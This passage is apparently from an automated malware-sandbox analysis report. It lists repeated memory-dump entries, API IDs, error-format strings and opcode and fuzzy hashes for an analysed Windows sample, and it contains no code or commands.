    • Instruction Fuzzy Hash: 6BF05E27B1821243F9529B04B4457B9135A1F4577CF4A0931DD5CAB6D2AE3EAC86A306
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: 598216c1ee724cec4807be68ed95eefc0d911833e57af68f66b0cc78dd6263b9
    • Instruction ID: a6e4ee3f26074366fac479b120d612f1490908929dfdd50ceaac3bed3d8efc8f
    • Opcode Fuzzy Hash: 598216c1ee724cec4807be68ed95eefc0d911833e57af68f66b0cc78dd6263b9
    • Instruction Fuzzy Hash: 41F05E27B1821243F9529B04B4407B9135A2F4577CF4A0931DD4CAB6D2AE3EAC86A306
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: 818da8196cb84a01bb97c639c4f07d118bc4aba2fcbbab1dbc363c6cbe084887
    • Instruction ID: 65ea38442251091a9576cd3dc29a11fa6f8f7917f1cf4be7e2b87c2d8fab1a0e
    • Opcode Fuzzy Hash: 818da8196cb84a01bb97c639c4f07d118bc4aba2fcbbab1dbc363c6cbe084887
    • Instruction Fuzzy Hash: 6DF05E27B1821243F9529B04B4407B9135A1F4577CF4A0931DD4CAB6D2AE3EAC86A306
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: 0a634cbf67000b6e04af3113307a55f98b113c92dc51018462aa1a852187c35c
    • Instruction ID: f27c1d457d57cf753e759cd64cfd6058fbdbd6a73e999af721828410d372ccfc
    • Opcode Fuzzy Hash: 0a634cbf67000b6e04af3113307a55f98b113c92dc51018462aa1a852187c35c
    • Instruction Fuzzy Hash: 65F05E27B1821243F9529B04B4407B9135A1F4577CF4A0932DD4CAB6D2AE3EAC86A306
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: 6007a24590ed1844e50f48340ece50facd8b82cec4727746faed6b73d15800c1
    • Instruction ID: 158cd23c653e2e61201ccb42def642dbb59dde8ec580ed007b4497ae490a158c
    • Opcode Fuzzy Hash: 6007a24590ed1844e50f48340ece50facd8b82cec4727746faed6b73d15800c1
    • Instruction Fuzzy Hash: 6BF05E27B1821243F9529B04B4457B9135A1F4577CF4A0931DD5CAB6D2AE3EAC86A306
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: 598216c1ee724cec4807be68ed95eefc0d911833e57af68f66b0cc78dd6263b9
    • Instruction ID: a6e4ee3f26074366fac479b120d612f1490908929dfdd50ceaac3bed3d8efc8f
    • Opcode Fuzzy Hash: 598216c1ee724cec4807be68ed95eefc0d911833e57af68f66b0cc78dd6263b9
    • Instruction Fuzzy Hash: 41F05E27B1821243F9529B04B4407B9135A2F4577CF4A0931DD4CAB6D2AE3EAC86A306
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: 26eab73764b8ffa4d3fb92dd5a0b9e18be74589822eee4ae34119ae3bc3fb425
    • Instruction ID: dfcb1d6ae9d4ff427fcaf1369cc1818d2edae7a8482b162114b595422635dc61
    • Opcode Fuzzy Hash: 26eab73764b8ffa4d3fb92dd5a0b9e18be74589822eee4ae34119ae3bc3fb425
    • Instruction Fuzzy Hash: 1BF05E27B1821643F9529B04B4407B9135A1F4577DF4A0931DD4CAB6D2AE3EAC86A306
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: 6007a24590ed1844e50f48340ece50facd8b82cec4727746faed6b73d15800c1
    • Instruction ID: 158cd23c653e2e61201ccb42def642dbb59dde8ec580ed007b4497ae490a158c
    • Opcode Fuzzy Hash: 6007a24590ed1844e50f48340ece50facd8b82cec4727746faed6b73d15800c1
    • Instruction Fuzzy Hash: 6BF05E27B1821243F9529B04B4457B9135A1F4577CF4A0931DD5CAB6D2AE3EAC86A306
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: 598216c1ee724cec4807be68ed95eefc0d911833e57af68f66b0cc78dd6263b9
    • Instruction ID: a6e4ee3f26074366fac479b120d612f1490908929dfdd50ceaac3bed3d8efc8f
    • Opcode Fuzzy Hash: 598216c1ee724cec4807be68ed95eefc0d911833e57af68f66b0cc78dd6263b9
    • Instruction Fuzzy Hash: 41F05E27B1821243F9529B04B4407B9135A2F4577CF4A0931DD4CAB6D2AE3EAC86A306
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: 26eab73764b8ffa4d3fb92dd5a0b9e18be74589822eee4ae34119ae3bc3fb425
    • Instruction ID: dfcb1d6ae9d4ff427fcaf1369cc1818d2edae7a8482b162114b595422635dc61
    • Opcode Fuzzy Hash: 26eab73764b8ffa4d3fb92dd5a0b9e18be74589822eee4ae34119ae3bc3fb425
    • Instruction Fuzzy Hash: 1BF05E27B1821643F9529B04B4407B9135A1F4577DF4A0931DD4CAB6D2AE3EAC86A306
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: 3fbfb2e90ff6b74489a7a57e3deef451135282a2a552d71fd954ab909784cf6c
    • Instruction ID: 86d5cb7930deea4094c3c7b668ace1629a8ceeee3dc9963ec287bbe99c4d15d2
    • Opcode Fuzzy Hash: 3fbfb2e90ff6b74489a7a57e3deef451135282a2a552d71fd954ab909784cf6c
    • Instruction Fuzzy Hash: 17F05E2BB1811243F9539B04B4407B9135A1F4576CF4A0932DD4CAB6D2AE3EAD86B306
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: 818da8196cb84a01bb97c639c4f07d118bc4aba2fcbbab1dbc363c6cbe084887
    • Instruction ID: 65ea38442251091a9576cd3dc29a11fa6f8f7917f1cf4be7e2b87c2d8fab1a0e
    • Opcode Fuzzy Hash: 818da8196cb84a01bb97c639c4f07d118bc4aba2fcbbab1dbc363c6cbe084887
    • Instruction Fuzzy Hash: 6DF05E27B1821243F9529B04B4407B9135A1F4577CF4A0931DD4CAB6D2AE3EAC86A306
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: 0a634cbf67000b6e04af3113307a55f98b113c92dc51018462aa1a852187c35c
    • Instruction ID: f27c1d457d57cf753e759cd64cfd6058fbdbd6a73e999af721828410d372ccfc
    • Opcode Fuzzy Hash: 0a634cbf67000b6e04af3113307a55f98b113c92dc51018462aa1a852187c35c
    • Instruction Fuzzy Hash: 65F05E27B1821243F9529B04B4407B9135A1F4577CF4A0932DD4CAB6D2AE3EAC86A306
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: 26eab73764b8ffa4d3fb92dd5a0b9e18be74589822eee4ae34119ae3bc3fb425
    • Instruction ID: dfcb1d6ae9d4ff427fcaf1369cc1818d2edae7a8482b162114b595422635dc61
    • Opcode Fuzzy Hash: 26eab73764b8ffa4d3fb92dd5a0b9e18be74589822eee4ae34119ae3bc3fb425
    • Instruction Fuzzy Hash: 1BF05E27B1821643F9529B04B4407B9135A1F4577DF4A0931DD4CAB6D2AE3EAC86A306
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: 6007a24590ed1844e50f48340ece50facd8b82cec4727746faed6b73d15800c1
    • Instruction ID: 158cd23c653e2e61201ccb42def642dbb59dde8ec580ed007b4497ae490a158c
    • Opcode Fuzzy Hash: 6007a24590ed1844e50f48340ece50facd8b82cec4727746faed6b73d15800c1
    • Instruction Fuzzy Hash: 6BF05E27B1821243F9529B04B4457B9135A1F4577CF4A0931DD5CAB6D2AE3EAC86A306
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: 598216c1ee724cec4807be68ed95eefc0d911833e57af68f66b0cc78dd6263b9
    • Instruction ID: a6e4ee3f26074366fac479b120d612f1490908929dfdd50ceaac3bed3d8efc8f
    • Opcode Fuzzy Hash: 598216c1ee724cec4807be68ed95eefc0d911833e57af68f66b0cc78dd6263b9
    • Instruction Fuzzy Hash: 41F05E27B1821243F9529B04B4407B9135A2F4577CF4A0931DD4CAB6D2AE3EAC86A306
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: 818da8196cb84a01bb97c639c4f07d118bc4aba2fcbbab1dbc363c6cbe084887
    • Instruction ID: 65ea38442251091a9576cd3dc29a11fa6f8f7917f1cf4be7e2b87c2d8fab1a0e
    • Opcode Fuzzy Hash: 818da8196cb84a01bb97c639c4f07d118bc4aba2fcbbab1dbc363c6cbe084887
    • Instruction Fuzzy Hash: 6DF05E27B1821243F9529B04B4407B9135A1F4577CF4A0931DD4CAB6D2AE3EAC86A306
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: 0a634cbf67000b6e04af3113307a55f98b113c92dc51018462aa1a852187c35c
    • Instruction ID: f27c1d457d57cf753e759cd64cfd6058fbdbd6a73e999af721828410d372ccfc
    • Opcode Fuzzy Hash: 0a634cbf67000b6e04af3113307a55f98b113c92dc51018462aa1a852187c35c
    • Instruction Fuzzy Hash: 65F05E27B1821243F9529B04B4407B9135A1F4577CF4A0932DD4CAB6D2AE3EAC86A306
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: Closefflushfwrite
    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
    • API String ID: 1001908780-1680961811
    • Opcode ID: 9c0b5fabe127716bf8518f75c5551f6d0a8f072a3ba3e7517ce0fd91c10b36ff
    • Instruction ID: 9ca24cb5e6b1d8c865462555ca8ef95ede873e5e29bf294157c03db1552c3b49
    • Opcode Fuzzy Hash: 9c0b5fabe127716bf8518f75c5551f6d0a8f072a3ba3e7517ce0fd91c10b36ff
    • Instruction Fuzzy Hash: D2F0FC12608A069AE5528F41B8403B96145AF547B5F4403B6ED2D66AB0DF2DD9C58708
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: Closefflushfwrite
    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
    • API String ID: 1001908780-1680961811
    • Opcode ID: ca6dd569a177849d8c2a45a9408bc3dfce42c36ed4bcb66d60c5af44c99c8d6a
    • Instruction ID: d72ec1da9abd3c5b44f92d9b4daf8c86ab3f0b544120d623b976ffb019553231
    • Opcode Fuzzy Hash: ca6dd569a177849d8c2a45a9408bc3dfce42c36ed4bcb66d60c5af44c99c8d6a
    • Instruction Fuzzy Hash: F6F0FC12608A069AE5528F01BC403B92145AF547B5F4403B6ED2D666B0DF2DD9C58308
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: Closefflushfwrite
    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
    • API String ID: 1001908780-1680961811
    • Opcode ID: 9a2de95ffd5d781e6813de5ef751d9da9c96fa48fc425b1bbe8cd7e8830a080e
    • Instruction ID: f70aa63cb50dcbb5c4290fcac9816dc4f89ddf8450a6395e0b1cb112690398ab
    • Opcode Fuzzy Hash: 9a2de95ffd5d781e6813de5ef751d9da9c96fa48fc425b1bbe8cd7e8830a080e
    • Instruction Fuzzy Hash: E6F0FC12608B068AE5528F01B8403B92145BF547B5F0803B5ED6D66AB0DF2DD9C99308
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
